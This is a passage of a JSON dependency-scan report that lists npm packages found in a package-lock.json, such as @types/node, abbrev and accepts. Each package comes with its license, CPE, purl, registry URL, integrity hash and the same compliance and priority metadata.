"annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/ms:\\@types\\/ms:2.1.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/ms@2.1.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/ms/-/ms-2.1.0.tgz", "integrity": "sha512-GsCCIZDE/p3i96vtEqx+7dBUGXrc7zeSK3wwPHIaRThS+9OhWIXRqzs4d6k1SVU8g91DrNRWxWUGhp5KXQb2VA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "191b23786146803d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/node 20.19.39", "title": "@types/node 20.19.39", "description": "Package discovered: @types/node 20.19.39", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "c19052194c7f9053", "name": "@types/node", "version": "20.19.39", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/node:\\@types\\/node:20.19.39:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/node@20.19.39", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/node/-/node-20.19.39.tgz", "integrity": "sha512-orrrD74MBUyK8jOAD/r0+lfa1I2MO6I+vAkmAWzMYbCcgrN4lCrmK52gRFQq/JRxfYPfonkr4b0jcY7Olqdqbw==", "dependencies": { "undici-types": "~6.21.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "9b5805676545e7d1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/node 22.19.17", "title": "@types/node 22.19.17", "description": "Package discovered: @types/node 22.19.17", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "b0b14dd646c615be", "name": "@types/node", "version": "22.19.17", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/node:\\@types\\/node:22.19.17:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/node@22.19.17", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/node/-/node-22.19.17.tgz", "integrity": "sha512-wGdMcf+vPYM6jikpS/qhg6WiqSV/OhG+jeeHT/KlVqxYfD40iYJf9/AE1uQxVWFvU7MipKRkRv8NSHiCGgPr8Q==", "dependencies": { "undici-types": "~6.21.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "08409c71d4ce88d9", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/request 2.48.13", "title": "@types/request 2.48.13", "description": "Package discovered: @types/request 2.48.13", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "656ffeda0aaf4e8b", "name": "@types/request", "version": "2.48.13", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/request:\\@types\\/request:2.48.13:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/request@2.48.13", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/request/-/request-2.48.13.tgz", "integrity": "sha512-FGJ6udDNUCjd19pp0Q3iTiDkwhYup7J8hpMW9c4k53NrccQFFWKRho6hvtPPEhnXWKvukfwAlB6DbDz4yhH5Gg==", "dependencies": { "@types/caseless": "*", "@types/node": "*", "@types/tough-cookie": "*", "form-data": "^2.5.5" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "dd961f2e03e7418d", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/tough-cookie 4.0.5", "title": "@types/tough-cookie 4.0.5", "description": "Package discovered: @types/tough-cookie 4.0.5", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "cf24fb05ea581070", "name": "@types/tough-cookie", "version": "4.0.5", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/tough-cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/tough_cookie:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/tough:\\@types\\/tough-cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:\\@types\\/tough:\\@types\\/tough_cookie:4.0.5:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/tough-cookie@4.0.5", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/tough-cookie/-/tough-cookie-4.0.5.tgz", "integrity": "sha512-/Ad8+nIOV7Rl++6f1BdKxFSMgmoqEoYbHRpPcx3JEfv8VRsQe9Z4mCXeJBzxs7mbHY/XOZZuXlRNfhpVPbs6ZA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "7a188cdbd82f20f1", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: @types/ws 8.18.1", "title": "@types/ws 8.18.1", "description": "Package discovered: @types/ws 8.18.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "919683ef9260890b", "name": "@types/ws", "version": "8.18.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:\\@types\\/ws:\\@types\\/ws:8.18.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/%40types/ws@8.18.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/@types/ws/-/ws-8.18.1.tgz", "integrity": "sha512-ThVF6DCVhA8kUGy+aazFQ4kXQ7E1Ty7A3ypFOe0IcJV8O/M511G99AW24irKrW56Wt44yG9+ij8FaqoBGkuBXg==", "dependencies": { "@types/node": "*" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "89056081bb223fd4", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: abbrev 2.0.0", "title": "abbrev 2.0.0", "description": "Package discovered: abbrev 2.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "0277554910df9b38", "name": "abbrev", "version": "2.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "ISC", "spdxExpression": "ISC", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:abbrev:abbrev:2.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/abbrev@2.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/abbrev/-/abbrev-2.0.0.tgz", "integrity": "sha512-6/mh1E2u2YgEsCHdY0Yx5oW+61gZU+1vXaoiHHrpKeuRNNgFvS+/jrwHiQhB5apAf5oB7UB7E19ol2R2LKH8hQ==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "873a6392b6c08a39", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: abort-controller 3.0.0", "title": "abort-controller 3.0.0", "description": "Package discovered: abort-controller 3.0.0", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "02974b3dbbe4d3d6", "name": "abort-controller", "version": "3.0.0", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:abort-controller:abort-controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abort-controller:abort_controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abort_controller:abort-controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abort_controller:abort_controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abort:abort-controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abort:abort_controller:3.0.0:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/abort-controller@3.0.0", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/abort-controller/-/abort-controller-3.0.0.tgz", "integrity": "sha512-h8lQ8tacZYnR3vNQTgibj+tODHI5/+l06Au2Pcriv/Gmet0eaj4TwWH41sO9wnHDiQsEj19q0drzdWdeAHtweg==", "dependencies": { "event-target-shim": "^5.0.0" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "661684530a17a73f", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: abs-svg-path 0.1.1", "title": "abs-svg-path 0.1.1", "description": "Package discovered: abs-svg-path 0.1.1", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "2eb8f1fab63663a1", "name": "abs-svg-path", "version": "0.1.1", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:abs-svg-path:abs-svg-path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs-svg-path:abs_svg_path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs_svg_path:abs-svg-path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs_svg_path:abs_svg_path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs-svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs-svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs_svg:abs-svg-path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs_svg:abs_svg_path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs:abs-svg-path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" }, { "cpe": "cpe:2.3:a:abs:abs_svg_path:0.1.1:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/abs-svg-path@0.1.1", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/abs-svg-path/-/abs-svg-path-0.1.1.tgz", "integrity": "sha512-d8XPSGjfyzlXC3Xx891DJRyZfqk5JU0BJrDQcsWomFIV1/BIzPW5HDH5iDdWpqWaav0YVIEzT1RHTwWr0FFshA==", "dependencies": null } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { "requirement": "6.3.3", "description": "Security vulnerabilities are identified and managed", "priority": "CRITICAL" }, { "requirement": "11.3.1", "description": "Internal vulnerability scans are performed", "priority": "HIGH" } ], "mitreAttack": [ { "tactic": "Initial Access", "technique": "T1195", "techniqueName": "Supply Chain Compromise", "subtechnique": "T1195.001", "subtechniqueName": "Compromise Software Dependencies and Development Tools" } ] }, "priority": { "priority": 3.333333333333333, "epss": null, "epss_percentile": null, "is_kev": false, "kev_due_date": null, "components": { "severity_score": 1, "epss_multiplier": 1.0, "kev_multiplier": 1.0, "reachability_multiplier": 1.0 } } }, { "schemaVersion": "1.2.0", "id": "27802507a1dbe242", "ruleId": "SBOM.PACKAGE", "severity": "INFO", "tool": { "name": "syft", "version": "unknown" }, "location": { "path": "/package-lock.json", "startLine": 0 }, "message": "Package discovered: accepts 1.3.8", "title": "accepts 1.3.8", "description": "Package discovered: accepts 1.3.8", "remediation": "Track and scan dependencies.", "references": [], "tags": [ "sbom", "package" ], "raw": { "id": "e96668e505272792", "name": "accepts", "version": "1.3.8", "type": "npm", "foundBy": "javascript-lock-cataloger", "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ], "licenses": [ { "value": "MIT", "spdxExpression": "MIT", "type": "declared", "urls": [], "locations": [ { "path": "/package-lock.json", "accessPath": "/package-lock.json", "annotations": { "evidence": "primary" } } ] } ], "language": "javascript", "cpes": [ { "cpe": "cpe:2.3:a:accepts:accepts:1.3.8:*:*:*:*:*:*:*", "source": "syft-generated" } ], "purl": "pkg:npm/accepts@1.3.8", "metadataType": "javascript-npm-package-lock-entry", "metadata": { "resolved": "https://registry.npmjs.org/accepts/-/accepts-1.3.8.tgz", "integrity": "sha512-PYAthTa2m2VKxuvSD3DPC/Gy+U+sOA1LAuT8mkmRuvw+NACSaeXEQ+NHcVF7rONl6qcaxV3Uuemwawk+7+SJLw==", "dependencies": { "mime-types": "~2.1.34", "negotiator": "0.6.3" } } }, "compliance": { "cisControlsV8_1": [ { "control": "7.1", "title": "Establish and Maintain a Vulnerability Management Process", "implementationGroup": "IG1" }, { "control": "7.2", "title": "Establish and Maintain a Remediation Process", "implementationGroup": "IG1" }, { "control": "7.3", "title": "Perform Automated Operating System Patch Management", "implementationGroup": "IG1" }, { "control": "7.4", "title": "Perform Automated Application Patch Management", "implementationGroup": "IG2" }, { "control": "16.11", "title": "Leverage Vetted Modules or Services for Application Security Components", "implementationGroup": "IG2" } ], "nistCsf2_0": [ { "function": "IDENTIFY", "category": "ID.RA", "subcategory": "ID.RA-1", "description": "Asset vulnerabilities are identified and documented" }, { "function": "GOVERN", "category": "GV.SC", "subcategory": "GV.SC-3", "description": "Cybersecurity supply chain risk management processes are identified, established, assessed, managed, and agreed upon by organizational stakeholders" } ], "pciDss4_0": [ { 